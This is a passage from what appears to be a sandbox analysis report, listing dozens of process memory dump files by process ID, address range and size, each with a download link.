memory/3900-1555-0x00007FF6F57B0000-0x00007FF6F62DA000-memory.dmp

Filesize
11.2MB

Download
memory/3900-1452-0x00007FF6F57B0000-0x00007FF6F62DA000-memory.dmp

Filesize
11.2MB

Download
memory/3900-1677-0x00007FF6F57B0000-0x00007FF6F62DA000-memory.dmp

Filesize
11.2MB

Download
memory/3900-1370-0x00007FF6F57B0000-0x00007FF6F62DA000-memory.dmp

Filesize
11.2MB

Download
memory/3900-954-0x00007FF6F57B0000-0x00007FF6F62DA000-memory.dmp

Filesize
11.2MB

Download
memory/4360-148-0x00007FFB9FC70000-0x00007FFBA065C000-memory.dmp

Filesize
9.9MB

Download
memory/4360-184-0x000001F86EA30000-0x000001F86EA40000-memory.dmp

Filesize
64KB

Download
memory/4360-267-0x000001F86EA30000-0x000001F86EA40000-memory.dmp

Filesize
64KB

Download
memory/4360-185-0x000001F86EA30000-0x000001F86EA40000-memory.dmp

Filesize
64KB

Download
memory/4396-441-0x0000023852680000-0x0000023852690000-memory.dmp

Filesize
64KB

Download
memory/4396-203-0x0000023852680000-0x0000023852690000-memory.dmp

Filesize
64KB

Download
memory/4396-215-0x0000023852680000-0x0000023852690000-memory.dmp

Filesize
64KB

Download
memory/4396-163-0x00007FFB9FC70000-0x00007FFBA065C000-memory.dmp

Filesize
9.9MB

Download
memory/4412-237-0x00007FFB9FC70000-0x00007FFBA065C000-memory.dmp

Filesize
9.9MB

Download
memory/4412-258-0x00000225526F0000-0x0000022552700000-memory.dmp

Filesize
64KB

Download
memory/4412-243-0x00000225526F0000-0x0000022552700000-memory.dmp

Filesize
64KB

Download
memory/4560-171-0x00007FFB9FC70000-0x00007FFBA065C000-memory.dmp

Filesize
9.9MB

Download
memory/4560-241-0x000001904A390000-0x000001904A3A0000-memory.dmp

Filesize
64KB

Download
memory/4560-253-0x000001904A390000-0x000001904A3A0000-memory.dmp

Filesize
64KB

Download
memory/5036-158-0x00007FFB9FC70000-0x00007FFBA065C000-memory.dmp

Filesize
9.9MB

Download
memory/5036-68-0x000000001B120000-0x000000001B130000-memory.dmp

Filesize
64KB

Download
memory/5036-66-0x0000000000440000-0x0000000000524000-memory.dmp

Filesize
912KB

Download
memory/5036-67-0x00007FFB9FC70000-0x00007FFBA065C000-memory.dmp

Filesize
9.9MB

Download
memory/5036-69-0x0000000002590000-0x000000000259C000-memory.dmp

Filesize
48KB

Download
memory/5056-168-0x00007FFB9FC70000-0x00007FFBA065C000-memory.dmp

Filesize
9.9MB

Download
memory/5056-229-0x00000225D2030000-0x00000225D2040000-memory.dmp

Filesize
64KB

Download
memory/5056-233-0x00000225D2030000-0x00000225D2040000-memory.dmp

Filesize
64KB

Download
memory/5300-771-0x00000000002D0000-0x00000000002D1000-memory.dmp

Filesize
4KB

Download
memory/5300-773-0x00000000002E0000-0x00000000002E1000-memory.dmp

Filesize
4KB

Download
memory/5300-782-0x0000000000720000-0x0000000000721000-memory.dmp

Filesize
4KB

Download
memory/5300-767-0x00000000002C0000-0x00000000002C1000-memory.dmp

Filesize
4KB

Download
memory/5300-786-0x0000000000730000-0x0000000000731000-memory.dmp

Filesize
4KB

Download
memory/5300-775-0x0000000000700000-0x0000000000701000-memory.dmp

Filesize
4KB

Download
memory/5300-779-0x0000000000710000-0x0000000000711000-memory.dmp

Filesize
4KB

Download
memory/5300-789-0x00000000011F0000-0x0000000001CEA000-memory.dmp

Filesize
11.0MB

Download
memory/5400-1704-0x0000000005340000-0x000000000544E000-memory.dmp

Filesize
1.1MB

Download
memory/5520-466-0x0000000005AF0000-0x0000000005FEE000-memory.dmp

Filesize
5.0MB

Download
memory/5520-444-0x0000000000CF0000-0x0000000000D94000-memory.dmp

Filesize
656KB

Download
memory/5520-458-0x0000000073CD0000-0x00000000743BE000-memory.dmp

Filesize
6.9MB

Download
memory/5612-461-0x0000000000400000-0x000000000045A000-memory.dmp

Filesize
360KB

Download
memory/5812-822-0x00000000007E0000-0x00000000007E1000-memory.dmp

Filesize
4KB

Download
memory/5812-825-0x0000000000FF0000-0x0000000001AE2000-memory.dmp

Filesize
10.9MB

Download
memory/6036-1308-0x0000000000400000-0x0000000000444000-memory.dmp

Filesize
272KB

Download